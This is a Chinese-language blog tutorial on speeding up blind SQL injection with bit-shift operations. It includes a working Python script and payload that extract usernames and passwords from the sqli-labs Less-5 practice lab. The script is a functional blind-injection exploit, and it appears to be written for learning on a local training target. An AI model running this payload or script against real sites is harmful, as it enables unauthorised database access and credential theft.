使用位运算使sql盲注更加高效

如何提高sql盲注的效率和命中率一直是个值得研究的问题

目前的主流方法有

1.遍历

2.二分法

3.dns法

4.使用位运算

今天着重介绍位运算的方法

首先学习两个位运算符号<<(左移)>>(右移)

左移相当于乘2,右移相当于除以2

所以我们利用这个特性一个ascii码一个字节8位,我们循环8次就可以确定一个字符

例如:

s的ascii码值为115,换成2进制为 0111 0011

然后我们进行运算 0111 0011>>7=0

0111 0011>>6=01

......

也就是说每8次循环确定一个字符,非常高效快捷

import requests


def bitOperation(url):
    result = ""  # 存储获取的查询结果
    url_bak = url
    # 外层循环由查询结果字符的长度控制,内层循环即为固定的7次位运算
    for len in range(1, 777):  # 此处长度可控,也可以不做判断直接给一个很长的数字
        str = '0'  # 设置当前字符的ascii码二进制的第一位默认为0
        for i in range(0, 7):
            url = url.format(len, 6 - i, int(str + '0', 2))  # int(str + '0', 2)表示假设其第二位为0,若相等即条件为真,否则为假
            r = requests.get(url)
            # 以页面正常时的标识关键字作为区分,存在是为0,不存在是为1
            if r.text.find("You are in") != -1:
                str += '0'
            else:
                str += '1'
            url = url_bak
        # 二进制转换成十进制,也就是ascii码,再将ascii码转换成字符累加到result变量上
        result += chr(int(str, 2))
        print(result)
        if int(str, 2) == 0:  # 不再作判断长度, 当ascii码为00000000时自动退出(多发7个请求)
            print("已超过此次查询字符串的长度,自动停止")
            return result
        if int(str, 2) == 127:
            print("查询内容不存在或语法错误...")
            return result
    return result


    url = "http://127.0.0.1/sqli-labs/Less-5/?id=1' and ascii(substr((select group_concat(concat_ws(0x7e,username,password)) from users),{},1))>>{}={}-- -"
    bitOperation(url)


 

上一篇:数据结构之哈希表


下一篇:ASCII码是什么